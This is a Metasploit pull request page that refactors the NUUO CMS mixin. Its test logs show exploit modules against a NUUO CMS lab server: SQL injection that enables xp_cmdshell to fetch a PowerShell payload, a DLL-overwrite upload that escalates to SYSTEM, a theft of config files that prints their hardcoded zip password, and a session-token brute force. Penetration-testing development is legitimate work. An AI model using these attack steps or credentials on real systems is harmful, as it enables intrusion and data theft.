Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Update NUUO mixin, move code to Rex #11765

Merged
merged 16 commits into from Apr 25, 2019
Merged

Update NUUO mixin, move code to Rex #11765

merged 16 commits into from Apr 25, 2019

Conversation

jrobles-r7
Copy link
Contributor

@jrobles-r7 jrobles-r7 commented Apr 22, 2019
edited

Generalizing NUUO mixin code and moved implementation to Rex. One of the nuuo modules has been updated to work with the new code.

Note: This does break the nuuo modules that have not been updated. I'm working on fixes for those as well.
All the modules have been updated.

Verification

  • rspec spec/lib/rex/proto/nuuo/
  • Verify all green
  • ./msfconsole -q
  • use auxiliary/gather/nuuo_cms_file_download
  • set rhosts <rhost>
  • set NCSBRUTEAPI true
  • run
  • Module runs successfully. Config files downloaded

@jrobles-r7
Copy link
Contributor Author

Tested on Windows 10 running NCS Server v2.4.0

msf5 > use exploit/windows/nuuo/nuuo_cms_sqli
msf5 exploit(windows/nuuo/nuuo_cms_sqli) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 exploit(windows/nuuo/nuuo_cms_sqli) > set ncsbruteapi true
ncsbruteapi => true
msf5 exploit(windows/nuuo/nuuo_cms_sqli) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Using URL: http://0.0.0.0:8080/EqtOgSEOY
[*] Local IP: http://192.168.171.150:8080/EqtOgSEOY
[*] Server started.
[*] Enabling xp_cmdshell and asking CMS to download and execute http://172.22.222.136:8080/EqtOgSEOY
[*] Injecting PowerShell payload
[+] Sending the payload to CMS...
[*] Executing shell...
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 1 opened (172.22.222.136:4444 -> 172.22.222.200:49681) at 2019-04-24 06:58:12 -0500
[+] Deleted c:/windows/temp/jzyjzncewx.ps1
[*] Server stopped.

meterpreter > getuid
Server username: NT Service\MSSQLSERVER
meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.200 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(windows/nuuo/nuuo_cms_sqli) > 

msf5 > use exploit/windows/nuuo/nuuo_cms_fu
msf5 exploit(windows/nuuo/nuuo_cms_fu) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 exploit(windows/nuuo/nuuo_cms_fu) > set ncsbruteapi true
ncsbruteapi => true
msf5 exploit(windows/nuuo/nuuo_cms_fu) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Backing up LicenseTool.dll to NoaomDOkOZyn
[*] Uploading payload...
[*] Sleeping 15 seconds...
[*] Sending SENDLICFILE request, shell incoming!
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 2 opened (172.22.222.136:4444 -> 172.22.222.200:49682) at 2019-04-24 06:59:25 -0500

meterpreter > 
[!] Please wait a bit while we clean up
[+] Successfully restored LicenseTool.dll!
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
[+] We should have SYSTEM now, enjoy your shell!

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.200 - Meterpreter session 2 closed.  Reason: User exit
msf5 exploit(windows/nuuo/nuuo_cms_fu) >

msf5 > use auxiliary/gather/nuuo_cms_file_download
msf5 auxiliary(gather/nuuo_cms_file_download) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 auxiliary(gather/nuuo_cms_file_download) > set ncsbruteapi true
ncsbruteapi => true
msf5 auxiliary(gather/nuuo_cms_file_download) > exploit
[*] Running module against 172.22.222.200

[+] Downloaded file to /home/msfdev/.msf4/loot/20190424065707_default_172.22.222.200_CMServer.cfg_439756.cfg
[+] Downloaded file to /home/msfdev/.msf4/loot/20190424065707_default_172.22.222.200_ServerConfig.cfg_025736.cfg
[*] 

    The user and server configuration files were stored in the loot database.
    The files are ZIP encrypted, and due to the lack of the archive/zip gem,
    they cannot be decrypted in Metasploit.
    You will need to open them up with zip or a similar utility, and use the
    password NUCMS2007! to unzip them.
    Annoy the Metasploit developers until this gets fixed!
    
[*] Auxiliary module execution completed
msf5 auxiliary(gather/nuuo_cms_file_download) >

Tested on Windows 10 running NCS Server v2.1.0

msf5 > use auxiliary/gather/nuuo_cms_bruteforce
msf5 auxiliary(gather/nuuo_cms_bruteforce) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 auxiliary(gather/nuuo_cms_bruteforce) > exploit
[*] Running module against 172.22.222.200

[*] Bruteforcing session - this might take a while, go get some coffee!
[*] Generating 2621440 session tokens
[+] Found valid user session: 42204032
[*] Time taken: 1414.4688972589793 seconds; total tries 616910
[*] Auxiliary module execution completed
msf5 auxiliary(gather/nuuo_cms_bruteforce) >

@jrobles-r7 jrobles-r7 marked this pull request as ready for review April 24, 2019 12:10
@jrobles-r7
Remove protocol option
f3a820b 
Only tcp is supported for the mixin.
@jrobles-r7 jrobles-r7 self-assigned this Apr 25, 2019
@jrobles-r7 jrobles-r7 merged commit f3a820b into rapid7:master Apr 25, 2019
jrobles-r7 added a commit that referenced this pull request Apr 25, 2019
@jrobles-r7
Land #11765, Update NUUO mixin, move code to Rex
39aae36
@jrobles-r7 jrobles-r7 deleted the ncs-rex branch April 25, 2019 14:41
msjenkins-r7 pushed a commit that referenced this pull request Apr 25, 2019
@jrobles-r7 @msjenkins-r7
Land #11765, Update NUUO mixin, move code to Rex
5799e13
@jrobles-r7
Copy link
Contributor Author

jrobles-r7 commented Apr 25, 2019
edited by gdavidson-r7

Release Notes

This update generalizes the Nuuo mixin and adds code to Rex for handling NCS requests/responses.

@gdavidson-r7 gdavidson-r7 added the rn-enhancement release notes enhancement label Apr 29, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@wvu wvu wvu left review comments

@busterb busterb busterb approved these changes

Assignees

@jrobles-r7 jrobles-r7

Labels
enhancement library module rn-enhancement release notes enhancement tests
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@jrobles-r7 @busterb @wvu @gdavidson-r7